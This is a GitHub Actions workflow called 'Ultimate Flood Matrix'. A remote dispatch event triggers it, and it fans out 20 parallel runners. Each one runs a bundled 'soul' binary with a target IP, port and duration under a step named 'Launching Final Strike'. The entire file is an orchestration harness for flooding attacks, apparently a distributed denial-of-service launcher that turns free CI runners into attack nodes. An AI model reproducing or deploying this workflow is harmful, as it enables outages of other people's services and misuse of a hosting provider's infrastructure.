name: Ultimate Flood Matrix

on:
  repository_dispatch:
    types: [run-soul]

jobs:
  execute-soul:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        # 20 parallel sessions ek saath chalenge
        session: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
    
    steps:
      - name: Checkout code
        uses: actions/checkout@v4

      - name: Set permissions
        run: chmod +x soul

      - name: Launching Final Strike
        run: ./soul ${{ github.event.client_payload.ip }} ${{ github.event.client_payload.port }} ${{ github.event.client_payload.time }}
        
